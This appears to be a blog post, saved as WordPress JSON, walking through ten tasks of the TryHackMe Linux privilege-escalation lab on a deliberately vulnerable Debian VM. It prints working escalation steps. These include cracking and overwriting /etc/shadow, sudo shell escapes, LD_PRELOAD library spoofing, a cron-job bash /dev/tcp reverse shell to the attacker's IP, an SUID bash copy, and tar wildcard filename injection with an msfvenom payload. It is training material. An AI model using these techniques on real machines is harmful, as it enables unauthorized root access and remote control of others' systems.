{"id":131891,"date":"2023-02-16T18:46:16","date_gmt":"2023-02-16T18:46:16","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1138616"},"modified":"2023-02-16T18:46:16","modified_gmt":"2023-02-16T18:46:16","slug":"tryhackme-linux-privesc-magical-linux-privilege-escalation-1-2","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/02\/16\/tryhackme-linux-privesc-magical-linux-privilege-escalation-1-2\/","title":{"rendered":"TryHackMe Linux PrivEsc \u2013 Magical Linux Privilege Escalation (1\/2)"},"content":{"rendered":"\n<div class=\"kk-star-ratings kksr-auto kksr-align-left kksr-valign-top\" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1138616&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\\\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\\\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>\n<div class=\"kksr-stars\">\n<div class=\"kksr-stars-inactive\">\n<div class=\"kksr-star\" data-star=\"1\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"2\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"3\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"4\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"5\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"kksr-stars-active\" style=\"width: 142.5px;\">\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n<div class=\"kksr-legend\" style=\"font-size: 19.2px;\"> 5\/5 &#8211; (1 vote) <\/div>\n<\/p><\/div>\n<h2>CHALLENGE OVERVIEW<\/h2>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/tryhackme-linux-privesc-magical-linux-privilege-escalation-1-2\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2Fmtw2fk27bsY%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<ul>\n<li><strong>CTF Creator: <\/strong><a href=\"https:\/\/tryhackme.com\/p\/Tib3rius\"><strong>Tib3rius<\/strong><\/a><\/li>\n<li><strong>Link: <\/strong><a href=\"https:\/\/tryhackme.com\/room\/linuxprivesc\">https:\/\/tryhackme.com\/room\/linuxprivesc<\/a><\/li>\n<li><strong>Difficulty<\/strong>: medium&nbsp;<\/li>\n<li><strong>Target<\/strong>: gaining root access using a variety of different techniques<\/li>\n<li><strong>Highlight<\/strong>: Quickly gaining root access on a Linux computer in many different ways<\/li>\n<li><strong>Tags<\/strong>: <em>privesc, linux, privilege escalation<\/em><\/li>\n<\/ul>\n<h2>BACKGROUND<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"713\" height=\"472\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-230.png\" alt=\"\" class=\"wp-image-1138655\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-230.png 713w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-230-300x199.png 300w\" sizes=\"auto, (max-width: 713px) 100vw, 713px\" \/><\/figure>\n<\/div>\n<p>Using different exploits to compromise operating systems can feel like magic (when they work!).<\/p>\n<p>In this walkthrough, you will see various \u201cmagical\u201d ways that Linux systems can be rooted. These methods rely on the Linux system having misconfigurations that allow various read\/write\/execute permissions on files that should be better protected. In this post, we will cover tasks 1-10.<\/p>\n<h2>TASK 1 Deploy the Vulnerable Debian VM<\/h2>\n<p>After connecting to our TryHackMe VPN, let\u2019s start our <code>notes.txt<\/code> file and write down our IPs in an export fashion.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">export targetIP=10.10.63.231\nexport myIP=10.6.2.23<\/pre>\n<p>Now we can go ahead and log in via SSH using the starting credentials given in the instructions:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssh user@10.10.63.231\nid\nuid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)\n<\/pre>\n<p>Now that we are in via SSH, let\u2019s start exploiting this machine!<\/p>\n<h2>TASK 2 Service Exploits<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"534\" height=\"796\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-231.png\" alt=\"\" class=\"wp-image-1138658\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-231.png 534w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-231-201x300.png 201w\" sizes=\"auto, (max-width: 534px) 100vw, 534px\" \/><\/figure>\n<\/div>\n<p>In this task, we will privesc by exploiting MySQL using <a href=\"https:\/\/www.exploit-db.com\/exploits\/1518\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.exploit-db.com\/exploits\/1518<\/a><\/p>\n<p>We\u2019ll create a new file named <code>rootbash<\/code> that spawns a root shell. This box has the exploit preloaded, so all we have to do is cut and paste the commands from this section to try out the <strong>privesc<\/strong>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"393\" height=\"584\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-217.png\" alt=\"\" class=\"wp-image-1138627\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-217.png 393w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-217-202x300.png 202w\" sizes=\"auto, (max-width: 393px) 100vw, 393px\" \/><\/figure>\n<\/div>\n<h2>Task 3: Weak File Permissions &#8211; Readable \/etc\/shadow<\/h2>\n<p>In this task, we will read <code>\/etc\/shadow<\/code> and crack the hash with <strong><em><a href=\"https:\/\/blog.finxter.com\/tryhackme-daily-bugle-made-easy-a-helpful-walkthrough-with-hacking-video\/\" data-type=\"post\" data-id=\"1106248\" target=\"_blank\" rel=\"noreferrer noopener\">John the Ripper<\/a><\/em><\/strong>.<\/p>\n<p>First, we need to save the root entry from <code>\/etc\/shadow<\/code> file as <code>hash.txt<\/code>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"593\" height=\"115\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-218.png\" alt=\"\" class=\"wp-image-1138629\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-218.png 593w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-218-300x58.png 300w\" sizes=\"auto, (max-width: 593px) 100vw, 593px\" \/><\/figure>\n<\/div>\n<p>Next, let\u2019s load up John and crack the hash with <code>rockyou.txt<\/code> as our wordlist<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">john --wordlist=&lt;\/PATH\/TO\/>rockyou.txt hash.txt<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"372\" height=\"473\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-219.png\" alt=\"\" class=\"wp-image-1138631\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-219.png 372w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-219-236x300.png 236w\" sizes=\"auto, (max-width: 372px) 100vw, 372px\" \/><\/figure>\n<\/div>\n<p>We have found our root password, <code>password123<\/code>!<\/p>\n<h2>TASK 4: Weak File Permissions &#8211; Writeable \/etc\/shadow<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"716\" height=\"469\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-232.png\" alt=\"\" class=\"wp-image-1138659\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-232.png 716w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-232-300x197.png 300w\" sizes=\"auto, (max-width: 716px) 100vw, 716px\" \/><\/figure>\n<\/div>\n<p>In this task, we will change the root password in <code>\/etc\/shadow<\/code> file.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">mkpasswd -m sha-512 newpasswordhere\n$6$pz5mE.wYesKIYGN$jyRHWFXauy1tWmXLWABRKFjUplUH4u7w2YvxEysk5OPcS.HcgBoQkYt66gkkuMB6EKK8WUh1CY.BAO2mdOdPb.\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"422\" height=\"588\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-220.png\" alt=\"\" class=\"wp-image-1138638\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-220.png 422w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-220-215x300.png 215w\" sizes=\"auto, (max-width: 422px) 100vw, 422px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">user@debian:~\/tools\/mysql-udf$ nano \/etc\/shadow\nuser@debian:~\/tools\/mysql-udf$ su root\nPassword: root@debian:\/home\/user\/tools\/mysql-udf#\n<\/pre>\n<h2>TASK 5 Weak File Permissions &#8211; Writeable \/etc\/passwd<\/h2>\n<p>In this task, we will change the root passwd in <code>\/etc\/passwd<\/code>. First we need to generate a new hashed password:\u00a0<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">openssl passwd newpasswordhere<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"409\" height=\"545\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-221.png\" alt=\"\" class=\"wp-image-1138639\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-221.png 409w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-221-225x300.png 225w\" sizes=\"auto, (max-width: 409px) 100vw, 409px\" \/><\/figure>\n<\/div>\n<h2>TASK 6 Sudo &#8211; Shell Escape Sequences<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"534\" height=\"796\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-233.png\" alt=\"\" class=\"wp-image-1138660\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-233.png 534w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-233-201x300.png 201w\" sizes=\"auto, (max-width: 534px) 100vw, 534px\" \/><\/figure>\n<\/div>\n<p>Let\u2019s check our sudo privileges:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo -l<\/pre>\n<p>We can choose any of the many bin files that we have sudo permissions on, except for the apache2 bin that doesn\u2019t have a sudo exploit listed on GTFObins<\/p>\n<p>Today we\u2019ll choose to run the exploit utilizing the more bin file.<\/p>\n<p class=\"has-base-background-color has-background\"><img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/1f449.png\" alt=\"\ud83d\udc49\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" \/> <strong>Link<\/strong>: <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/more\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/gtfobins.github.io\/gtfobins\/more\/<\/a><\/p>\n<p>Running the following two commands gives us a root shell:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">TERM= sudo more \/etc\/profile\n!\/bin\/sh\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"420\" height=\"595\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-222.png\" alt=\"\" class=\"wp-image-1138643\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-222.png 420w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-222-212x300.png 212w\" sizes=\"auto, (max-width: 420px) 100vw, 420px\" \/><\/figure>\n<\/div>\n<h2>TASK 7 Sudo &#8211; Environment Variables<\/h2>\n<h3>Method 1: preload file spoofing<\/h3>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gcc -fPIC -shared -nostartfiles -o \/tmp\/preload.so \/home\/user\/tools\/sudo\/preload.c\nsudo LD_PRELOAD=\/tmp\/preload.so more\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"530\" height=\"564\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-223.png\" alt=\"\" class=\"wp-image-1138644\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-223.png 530w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-223-282x300.png 282w\" sizes=\"auto, (max-width: 530px) 100vw, 530px\" \/><\/figure>\n<\/div>\n<h3>Method 2: shared object spoofing<\/h3>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ldd \/usr\/sbin\/apache2\ngcc -o \/tmp\/libcrypt.so.1 -shared -fPIC \/home\/user\/tools\/sudo\/library_path.c\nsudo LD_LIBRARY_PATH=\/tmp apache2\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"675\" height=\"247\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-224.png\" alt=\"\" class=\"wp-image-1138645\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-224.png 675w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-224-300x110.png 300w\" sizes=\"auto, (max-width: 675px) 100vw, 675px\" \/><\/figure>\n<\/div>\n<h2>TASK 8 Cron Jobs &#8211; File Permissions<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"711\" height=\"537\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-234.png\" alt=\"\" class=\"wp-image-1138661\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-234.png 711w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-234-300x227.png 300w\" sizes=\"auto, (max-width: 711px) 100vw, 711px\" \/><\/figure>\n<\/div>\n<p>In this task, we will root the Linux box by changing the file <code>overwrite.sh<\/code> that is scheduled to run automatically every minute on cron jobs. <\/p>\n<p>Because we have to write file permissions on the file, we can change the contents to spawn a revshell that we can catch on a listener. The file is owned by root, so it will spawn a root shell.<\/p>\n<p>Overwrite the file with the following:<\/p>\n<pre class=\"wp-block-preformatted\"><code>#!\/bin\/bash\nbash -i >&amp; \/dev\/tcp\/10.6.2.23\/8888 0>&amp;1<\/code><\/pre>\n<p>Now, all we need to do is start a <code>netcat<\/code> listener and wait for a maximum of 1 minute to catch the revshell.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 8888<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"807\" height=\"497\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-225.png\" alt=\"\" class=\"wp-image-1138647\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-225.png 807w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-225-300x185.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-225-768x473.png 768w\" sizes=\"auto, (max-width: 807px) 100vw, 807px\" \/><\/figure>\n<\/div>\n<h2>TASK 9 Cron Jobs &#8211; PATH Environment Variable<\/h2>\n<p>In this task, we will hijack the <code>PATH<\/code> environment variable by creating an <code>overwrite.sh<\/code> file in <code>\/home\/user<\/code> directory.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">user@debian:~$ cat overwrite.sh #!\/bin\/bash\ncp \/bin\/bash \/tmp\/rootbash\nchmod +xs \/tmp\/rootbash\n<\/pre>\n<p>This bash script will copy <code>\/bin\/bash<\/code> (the shell) to the <code>tmp<\/code> directory, then add execute privileges and an <code>suid<\/code> bit. After the <code>overwrite.sh<\/code> file runs, we can manually activate the root shell by running the new file \u201c<code>rootbash<\/code>\u201d with persistence mode.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">user@debian:~$ \/tmp\/rootbash -p\nrootbash-4.1# id uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)\nrootbash-4.1# exit\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"800\" height=\"895\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-226.png\" alt=\"\" class=\"wp-image-1138648\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-226.png 800w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-226-268x300.png 268w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-226-768x859.png 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/figure>\n<\/div>\n<h2>TASK 10 Cron Jobs &#8211; Wildcards<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"708\" height=\"468\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-235.png\" alt=\"\" class=\"wp-image-1138662\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-235.png 708w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-235-300x198.png 300w\" sizes=\"auto, (max-width: 708px) 100vw, 708px\" \/><\/figure>\n<\/div>\n<p>In this exploit, we will use strange filenames to trick the system into thinking they are checkpoint flags on the tarball command which issue a command to run the elf shell to give us a root shell on our <code>netcat<\/code> listener.\u00a0<\/p>\n<p>First, let\u2019s create a new payload for a revshell<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">msfvenom -p linux\/x64\/shell_reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f elf -o shell.elf<\/pre>\n<p>Next, we\u2019ll transfer the elf file to <code>\/home\/usr<\/code> on the target via a <a href=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" data-type=\"post\" data-id=\"8635\" target=\"_blank\" rel=\"noreferrer noopener\">simple HTTP server<\/a>. Finally, we need to create two empty files with the following names:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">touch \/home\/user\/--checkpoint=1\ntouch \/home\/user\/--checkpoint-action=exec=shell.elf\n<\/pre>\n<p>Finally, we\u2019ll need to start up a <code>netcat<\/code> listener to catch the root shell.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 8888<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"765\" height=\"173\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-227.png\" alt=\"\" class=\"wp-image-1138649\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-227.png 765w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-227-300x68.png 300w\" sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/figure>\n<\/div>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"393\" height=\"481\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-228.png\" alt=\"\" class=\"wp-image-1138650\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-228.png 393w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-228-245x300.png 245w\" sizes=\"auto, (max-width: 393px) 100vw, 393px\" \/><\/figure>\n<\/div>\n<h2>POST-EXPLOITATION<\/h2>\n<p>Let\u2019s remove the shell and the other two spoofed empty command extension files.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">rm \/home\/user\/shell.elf\nrm \/home\/user\/--checkpoint=1\nrm \/home\/user\/--checkpoint-action=exec=shell.elf\n<\/pre>\n<h2>FINAL THOUGHTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"527\" height=\"797\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-236.png\" alt=\"\" class=\"wp-image-1138665\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-236.png 527w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-236-198x300.png 198w\" sizes=\"auto, (max-width: 527px) 100vw, 527px\" \/><\/figure>\n<\/div>\n<p>Magic isn\u2019t actually needed to carry out any of the <code>privesc<\/code> methods outlined in this post. <\/p>\n<p>As long as the target machine has a misconfiguration on password files (<code>\/etc\/shadow<\/code> and\/or <code>\/etc\/passwd<\/code>), cron jobs are set to run files that we can modify or spoof, or a PATH variable that we can hijack with a spoof file, we can easily escalate privileges to the root user.<\/p>\n<p>Thanks for reading this write-up, and be sure to check out part II for more \u201cmagical\u201d privesc methods.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) CHALLENGE OVERVIEW CTF Creator: Tib3rius Link: https:\/\/tryhackme.com\/room\/linuxprivesc Difficulty: medium&nbsp; Target: gaining root access using a variety of different techniques Highlight: Quickly gaining root access on a Linux computer in many different ways Tags: privesc, linux, privilege escalation BACKGROUND Using different exploits to compromise operating systems can feel like magic (when they [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-131891","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131891","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=131891"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131891\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=131891"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=131891"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=131891"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}